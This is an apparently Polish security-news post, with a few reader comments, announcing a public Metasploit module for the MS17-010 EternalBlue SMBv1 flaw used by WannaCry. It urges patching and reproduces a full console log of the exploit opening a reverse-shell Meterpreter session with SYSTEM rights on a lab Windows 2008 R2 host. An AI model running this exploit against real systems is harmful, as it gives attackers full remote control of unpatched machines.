Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book
Zdalny exploit na MS17-010 – dostępny w Metasploit
Kto jeszcze nie załatał swoich Windowsów, radzę się pospieszyć. Dostępny jest już publicznie exploit na podatność MS17-010 (zdalne otrzymanie pełnych uprawnień na Windowsach – przez protokół SMBv1). Przypominam to błąd wykorzystywany przez ransomware WannaCrypt / Wana Decrypt0r 2.0 / Wanacry.
Użycie exploita nie wymaga jakiejś wielkiej wiedzy – po prostu ognia:
msf exploit(ms17_010_eternalblue) > run [*] Started reverse TCP handler on 192.168.33.1:4444 [*] 192.168.33.129:445 - Connecting to target for exploitation. [+] 192.168.33.129:445 - Connection established for exploitation. [*] 192.168.33.129:445 - Trying exploit with 12 Groom Allocations. [*] 192.168.33.129:445 - Sending all but last fragment of exploit packet [*] 192.168.33.129:445 - Sending NT Trans Request packet [*] 192.168.33.129:445 - Receiving NT Trans packet [*] 192.168.33.129:445 - Making :eb_trans2_zero packet [*] 192.168.33.129:445 - Making :eb_trans2_buffer packet [*] 192.168.33.129:445 - Making :eb_trans2_buffer packet [*] 192.168.33.129:445 - Making :eb_trans2_buffer packet [*] 192.168.33.129:445 - Making :eb_trans2_buffer packet [*] 192.168.33.129:445 - Making :eb_trans2_buffer packet [*] 192.168.33.129:445 - Making :eb_trans2_buffer packet [*] 192.168.33.129:445 - Making :eb_trans2_buffer packet [*] 192.168.33.129:445 - Making :eb_trans2_buffer packet [*] 192.168.33.129:445 - Making :eb_trans2_buffer packet [*] 192.168.33.129:445 - Making :eb_trans2_buffer packet [*] 192.168.33.129:445 - Making :eb_trans2_buffer packet [*] 192.168.33.129:445 - Making :eb_trans2_buffer packet [*] 192.168.33.129:445 - Making :eb_trans2_buffer packet [*] 192.168.33.129:445 - Making :eb_trans2_buffer packet [*] 192.168.33.129:445 - Sending malformed Trans2 packets [*] 192.168.33.129:445 - Starting non-paged pool grooming [*] 192.168.33.129:445 - Sending start free hole packet. [*] 192.168.33.129:445 - Receiving free hole response. [+] 192.168.33.129:445 - Sending SMBv2 buffers [*] 192.168.33.129:445 - Sending end free hole packet. [*] 192.168.33.129:445 - Receiving free hole response. [+] 192.168.33.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 192.168.33.129:445 - Sending final SMBv2 buffers. [*] 192.168.33.129:445 - Sending last fragment of exploit packet! [*] 192.168.33.129:445 - Making :eb_trans2_exploit packet [*] 192.168.33.129:445 - Receiving response from exploit packet [+] 192.168.33.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 192.168.33.129:445 - Sending egg to corrupted connection. [*] 192.168.33.129:445 - Triggering free of corrupted buffer. [*] Sending stage (1189423 bytes) to 192.168.33.129 [*] Meterpreter session 1 opened (192.168.33.1:4444 -> 192.168.33.129:49159) at 2017-05-14 20:03:33 -0500 [+] 192.168.33.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.33.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.33.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > sysinfo Computer : WIN-KAUD1INC0IJ OS : Windows 2008 R2 (Build 7601, Service Pack 1). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 1 Meterpreter : x64/windows meterpreter >
Na razie potwierdzone jest działanie na: Windows 7 x64 / Windows 2008 R2 SP1. A port na architektury 32 bitowe – i Windows XP – w trakcie.
–ms
No a gdzie link do zrodla?
https://github.com/rapid7/metasploit-framework/pull/8381
Przyda się do odpalania aplikacji na oscyloskopach